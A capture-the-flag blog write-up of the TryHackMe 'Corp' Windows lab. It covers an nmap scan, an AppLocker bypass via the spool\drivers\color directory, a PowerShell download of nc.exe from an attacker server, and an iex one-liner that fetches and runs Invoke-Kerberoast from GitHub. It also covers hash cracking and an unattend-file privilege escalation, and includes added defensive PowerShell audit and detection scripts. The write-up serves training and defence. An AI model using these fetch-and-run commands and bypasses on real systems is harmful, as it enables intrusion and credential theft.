TryHackMe Corp Writeup – Bypassing Windows Server 2019 Applocker and Kerberoasting

Hello and welcome back to my TryHackMe writeups. Today I have assigned myself a new task: compromise a Windows machine in the TryHackMe lab. The machine, called “Corp”, is a Windows Server 2019 Datacenter Edition host.

This machine is subscriber-only. The best part of subscribing to THM is that in some challenges you get access to a real virtual machine, which you can either RDP into or access through your favourite web browser. However, I always prefer to RDP directly from my Windows laptop to such machines because of the stability.

The Real Task

The task is to bypass Windows AppLocker and escalate privileges. By the end of the exploit you will have learned the basics of Kerberoasting, evading antivirus detection, bypassing AppLocker and escalating privileges on a Windows server.

Let us start.

Let us run an nmap scan first:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 12:41 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating Ping Scan at 12:41
Scanning 52.17.118.122 [4 ports]
Completed Ping Scan at 12:41, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:41
Completed Parallel DNS resolution of 1 host. at 12:41, 5.52s elapsed
Initiating SYN Stealth Scan at 12:41
Scanning ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122) [1000 ports]
Discovered open port 2000/tcp on 52.17.118.122
Discovered open port 139/tcp on 52.17.118.122
Discovered open port 135/tcp on 52.17.118.122
Discovered open port 53/tcp on 52.17.118.122
Discovered open port 3389/tcp on 52.17.118.122
Discovered open port 445/tcp on 52.17.118.122
Discovered open port 636/tcp on 52.17.118.122
Discovered open port 3268/tcp on 52.17.118.122
Discovered open port 593/tcp on 52.17.118.122
Discovered open port 5060/tcp on 52.17.118.122
Discovered open port 3269/tcp on 52.17.118.122
Discovered open port 464/tcp on 52.17.118.122
Discovered open port 389/tcp on 52.17.118.122
Completed SYN Stealth Scan at 12:42, 36.12s elapsed (1000 total ports)
Initiating Service scan at 12:42
Scanning 13 services on ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Completed Service scan at 12:44, 161.31s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Retrying OS detection (try #2) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Initiating Traceroute at 12:44
Completed Traceroute at 12:44, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:44
Completed Parallel DNS resolution of 2 hosts. at 12:44, 0.13s elapsed
NSE: Script scanning 52.17.118.122.
Initiating NSE at 12:44
Completed NSE at 12:45, 44.70s elapsed
Initiating NSE at 12:45
Completed NSE at 12:47, 121.02s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Nmap scan report for ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Host is up (0.024s latency).
Not shown: 986 filtered ports
PORT     STATE  SERVICE       VERSION
53/tcp   open   domain?
113/tcp  closed ident
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open   tcpwrapped
2000/tcp open   cisco-sccp?
3268/tcp open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
3269/tcp open   tcpwrapped
3389/tcp open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: OMEGA
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: omega.corp.local
|   DNS_Tree_Name: corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-05-14T09:44:49+00:00
| ssl-cert: Subject: commonName=omega.corp.local
| Issuer: commonName=omega.corp.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T08:30:43
| Not valid after:  2020-11-12T08:30:43
| MD5:   d5c2 a37d 4171 365c 17af 2d4c a108 3285
|_SHA-1: fa74 2b64 e46e f599 ac78 63da bc40 d054 669c 2b9b
|_ssl-date: 2020-05-14T09:45:33+00:00; 0s from scanner time.
5060/tcp open   sip?
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (94%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=20 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-14T09:44:51
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   1.43 ms 10.0.2.2
2   1.66 ms ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)

NSE: Script Post-scanning.
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 377.06 seconds
           Raw packets sent: 3044 (136.980KB) | Rcvd: 258 (12.231KB)

OK, a good number of ports are open. I will consider the remaining ports later and try to RDP into the machine first. I used my Windows RDP client to connect and test, and then used xfreerdp on my Kali box for easy access to a file share.


[Task 2] Bypassing Applocker

AppLocker is the application whitelisting technology introduced with Windows 7. It restricts which programs users can execute based on the application’s path, publisher or file hash.

How To Bypass AppLocker

There are many ways to bypass AppLocker. If AppLocker is configured with the default rules, we can bypass it by placing an executable in a directory that the default path rules allow. C:\Windows\System32\spool\drivers\color is the one most commonly abused, because it sits under the default %WINDIR% allow rule yet is writable by standard users.

The other ways are discussed here:

There is also a full GitHub repo called “Ultimate AppLocker ByPass List” that collects the different possible bypass techniques.

In this challenge I’m going to use the location C:\Windows\System32\spool\drivers\color: I move my netcat.exe there and run programs from that location, because anything run from there is allowed by the default rules.

I hosted a Python SimpleHTTPServer and tried to copy nc.exe to that path manually, but I was blocked by the Internet Explorer security settings.

Using PowerShell to Import the exe

I used PowerShell’s Invoke-WebRequest to download the file from my local Python HTTP server.

Command:

Invoke-WebRequest http://10.11.xxx.xxx:8888/nc.exe -OutFile C:\Users\dark\Desktop\nc.exe

To make sure netcat works, I simply ran it and called the help; it is confirmed working.

Task 2-1 is done.
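The bypass above works because a standard user can write into a directory that the default AppLocker path rules allow. The following audit is an added example (not from the writeup or from any tool it mentions): it reads the effective AppLocker Exe rules and reports every directory under an "Allow" path rule that Everyone, Authenticated Users or Users can create files in. It assumes the AppLocker module is present and is run elevated on the server being audited.

```powershell
# Added example, not from the original writeup. Audit for user-writable
# directories under AppLocker "Allow" path rules (e.g. the spool\drivers\color
# directory under the default %WINDIR%\* rule). Run elevated; needs the
# AppLocker module (Get-AppLockerPolicy).

$lowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')   # Everyone, Authenticated Users, Users
$createFiles = [System.Security.AccessControl.FileSystemRights]::CreateFiles

# AppLocker path rules use their own variables rather than %WINDIR%-style env vars.
$pathVars = @{
    '%WINDIR%'       = $env:WINDIR
    '%SYSTEM32%'     = Join-Path $env:WINDIR 'System32'
    '%PROGRAMFILES%' = $env:ProgramFiles
    '%OSDRIVE%'      = $env:SystemDrive
}

[xml]$policy = Get-AppLockerPolicy -Effective -Xml
$allowPaths = $policy.AppLockerPolicy.RuleCollection |
    Where-Object { $_.Type -eq 'Exe' } |
    ForEach-Object { $_.FilePathRule } |
    Where-Object { $_.Action -eq 'Allow' -and $lowPrivSids -contains $_.UserOrGroupSid } |
    ForEach-Object { $_.Conditions.FilePathCondition.Path }

foreach ($rulePath in $allowPaths) {
    $root = $rulePath
    foreach ($var in $pathVars.Keys) { $root = $root.Replace($var, $pathVars[$var]) }
    $root = $root.TrimEnd('*').TrimEnd('\')
    # A bare "*" rule (allow everything) leaves no root directory to scan.
    if (-not $root -or -not (Test-Path -LiteralPath $root -PathType Container)) { continue }

    Get-ChildItem -LiteralPath $root -Directory -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
                catch { continue }
                if ($lowPrivSids -contains $sid -and (($ace.FileSystemRights -band $createFiles) -ne 0)) {
                    [pscustomobject]@{ Rule = $rulePath; Directory = $_.FullName
                                       Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
                    break   # one finding per directory is enough
                }
            }
        }
}
```

Every directory it lists is a place where a standard user can stage a binary that the path rule will then allow; tighten the directory ACL or add an explicit AppLocker deny or exception for it.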

Task 2-2 – Obtaining The Flag from the ConsoleHost_history

Like other OS consoles, PowerShell also stores the console history, in a file called ConsoleHost_history.txt at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. I need to obtain the first flag from that file.

Command:

And here is the flag:

[Task 3] Kerberoasting

Task 3 is Kerberoasting. I’m supposed to use a PowerShell script to request a service ticket for an account and obtain the ticket hash. Then I will need to crack the hash and get access to another user account!

First, I need to find all accounts that have a Service Principal Name (SPN). For this I will use the command:

setspn -T medin -Q */*

The command runs for a couple of seconds and returns the SPN accounts on the server.

PS C:\Windows\System32\spool\drivers\color> setspn -T medin -Q */*
Ldap Error(0x51 -- Server Down): ldap_connect
Failed to retrieve DN for domain "medin" : 0x00000051
Warning: No valid targets specified, reverting to current domain.
CN=OMEGA,OU=Domain Controllers,DC=corp,DC=local
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/omega.corp.local
        ldap/omega.corp.local/ForestDnsZones.corp.local
        ldap/omega.corp.local/DomainDnsZones.corp.local
        TERMSRV/OMEGA
        TERMSRV/omega.corp.local
        DNS/omega.corp.local
        GC/omega.corp.local/corp.local
        RestrictedKrbHost/omega.corp.local
        RestrictedKrbHost/OMEGA
        RPC/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
        HOST/OMEGA/CORP
        HOST/omega.corp.local/CORP
        HOST/OMEGA
        HOST/omega.corp.local
        HOST/omega.corp.local/corp.local
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/7c4e4bec-1a37-4379-955f-a0475cd78a5d/corp.local
        ldap/OMEGA/CORP
        ldap/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
        ldap/omega.corp.local/CORP
        ldap/OMEGA
        ldap/omega.corp.local
        ldap/omega.corp.local/corp.local
CN=krbtgt,CN=Users,DC=corp,DC=local
        kadmin/changepw
CN=fela,CN=Users,DC=corp,DC=local
        HTTP/fela
        HOST/fela@corp.local
        HTTP/fela@corp.local

Existing SPN found!
PS C:\Windows\System32\spool\drivers\color>

I found an existing service account for the user called “fela”.

Getting Hash From Service Principal Name Account

Invoke-Kerberoast.ps1 is one of the commonly used PowerShell scripts to get the hash of an SPN account. Since the target machine is already connected to the internet, I download the script straight from GitHub.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

Once downloaded, I run Invoke-Kerberoast and output the hash in hashcat format so that it is easy for me to crack.

Cracking The hash

I used John to crack the hash with a very simple command and rockyou as the wordlist.

Once I had the password, I logged off the RDP session of the current user Dark and logged in as the new user Fela. Flag #2 was found on Fela’s desktop.
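The ticket requests made by Invoke-Kerberoast above leave a trail on the domain controller: each one is a Security event 4769 (service ticket requested), and for accounts like fela that have no AES keys configured the ticket is RC4-HMAC (encryption type 0x17). The following detection is an added example, not part of the writeup or of Empire; it assumes it is run on the DC with read access to the Security log, and the look-back window and reporting threshold are my own assumptions.

```powershell
# Added example, not from the original writeup. Hunt the DC Security log for
# Kerberoasting: successful 4769 service ticket requests for user accounts
# (not computer accounts or krbtgt) with RC4-HMAC (0x17) encryption, grouped
# by the requesting account. AES-only service accounts would show 0x12 instead,
# which is why enforcing AES on SPN accounts removes this indicator.

function Find-KerberoastActivity {
    param(
        [int]$Hours = 24,        # look-back window (assumption, tune per domain)
        [int]$MinServices = 1    # distinct roastable services per requester to report
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    $hits = foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        $service = [string]($d['ServiceName'] -split '@')[0]
        # Computer accounts ($) and krbtgt are requested constantly; skip them.
        if (-not $service -or $service.EndsWith('$') -or $service -eq 'krbtgt') { continue }
        # Only successful requests for RC4-HMAC tickets are of interest here.
        if ($d['Status'] -ne '0x0' -or $d['TicketEncryptionType'] -ne '0x17') { continue }

        [pscustomobject]@{
            Time      = $e.TimeCreated
            Requester = $d['TargetUserName']   # the account that asked for the ticket
            ClientIp  = $d['IpAddress']
            Service   = $service               # the SPN account whose ticket was issued
        }
    }

    $hits | Group-Object Requester | ForEach-Object {
        $services = @($_.Group.Service | Sort-Object -Unique)
        if ($services.Count -ge $MinServices) {
            [pscustomobject]@{
                Requester = $_.Name
                Services  = ($services -join ', ')
                Requests  = $_.Count
                FirstSeen = ($_.Group.Time | Measure-Object -Minimum).Minimum
                ClientIps = (@($_.Group.ClientIp | Sort-Object -Unique) -join ', ')
            }
        }
    }
}

Find-KerberoastActivity -Hours 24 | Format-Table -AutoSize
```

A single workstation user requesting RC4 tickets for several unrelated SPN accounts in a short burst is the classic Kerberoasting pattern; in this lab the report would show the "dark" user requesting a ticket for fela.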

Privilege Escalation To Administrator

Now that I have the user Fela compromised, I will look further and see if I can escalate my privileges to Administrator. For this I’m going to use PowerUp from PowerShellMafia’s PowerSploit. PowerUp looks for common Windows privilege escalation vectors that rely on misconfigurations. You will find more usage examples and guidance on the author’s blog.

First, I need to import the PowerShell script into the server directly from the GitHub repo and run Invoke-AllChecks to see if it finds any vulnerabilities.

The script found a couple of vulns; let us try the Unattended Path one. Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations and other users install Windows NT in unattended mode, and the answer file it leaves behind can store the Administrator password in Base64-encoded form.
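The finding PowerUp reports here is a leftover answer file that still holds a password. The following audit is an added example (not from the writeup or from PowerUp): it checks the usual answer-file locations, finds <Password> and <AdministratorPassword> elements that still have a value, and reports whether the value is plaintext or the Base64 form Setup writes, without printing the credential itself. The file paths are the common ones Windows Setup uses; run it elevated.

```powershell
# Added example, not from the original writeup. Report unattended-install
# answer files that still contain an account password, so they can be cleaned
# up. Setup stores such values either as plaintext (<PlainText>true</PlainText>)
# or as Base64 of the UTF-16LE password with the element name appended.

function Find-UnattendCredential {
    $candidates = @(
        "$env:WINDIR\Panther\Unattend.xml",
        "$env:WINDIR\Panther\Unattend\Unattend.xml",
        "$env:WINDIR\Panther\Unattended.xml",
        "$env:WINDIR\System32\Sysprep\Unattend.xml",
        "$env:WINDIR\System32\Sysprep\Panther\Unattend.xml",
        "$env:SystemDrive\Unattend.xml"
    )
    $ns = @{ u = 'urn:schemas-microsoft-com:unattend' }

    foreach ($path in $candidates) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $path -Raw -ErrorAction Stop } catch { continue }

        # <Password> lives under AutoLogon, <AdministratorPassword> under UserAccounts.
        $xpath = '//u:Password/u:Value | //u:AdministratorPassword/u:Value'
        foreach ($m in (Select-Xml -Xml $doc -Namespace $ns -XPath $xpath)) {
            $parent = $m.Node.ParentNode
            $value  = $m.Node.InnerText.Trim()
            if (-not $value) { continue }          # already cleared, nothing to report

            $storage = 'Unknown'
            if ($parent.PlainText -eq 'true') {
                $storage = 'PlainText'
            } else {
                try {
                    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value))
                    if ($decoded.EndsWith($parent.LocalName)) { $storage = 'Base64' }
                } catch { }
            }
            [pscustomobject]@{
                File    = $path
                Element = $parent.LocalName
                Storage = $storage
                Length  = $value.Length
                Action  = 'Clear the value or delete the file after deployment'
            }
        }
    }
}

Find-UnattendCredential | Format-Table -AutoSize
```

Any row this returns is readable by every local user, which is exactly what the Unattended Path check in PowerUp keys on; clearing the value (or deleting the file once deployment is done) closes it.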

Logging In As Administrator

I had an issue accessing the Administrator account: I wasn’t able to log in using xfreerdp, which gave a LoginFailure error. I tried a couple of times, then tried to log in from my Windows RDP client and noticed that the password had expired. Windows prompted me to change the password, but for some reason I couldn’t change it.

Whatever the error, I should get the flag, so I logged back in thinking I would try the DLL exploit found in the PowerSploit enumeration. But I found a shortcut: the flag could be read from the Administrator’s desktop as the user Fela, at C:/Users/Administrator/Desktop/flag.txt. I don’t know if that was allowed intentionally or was wrong access rights.

[UPDATE] – I managed to talk to Paradox over Discord, and it was an unintended way of getting the last flag, a small issue that I believe has already been fixed.

Thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
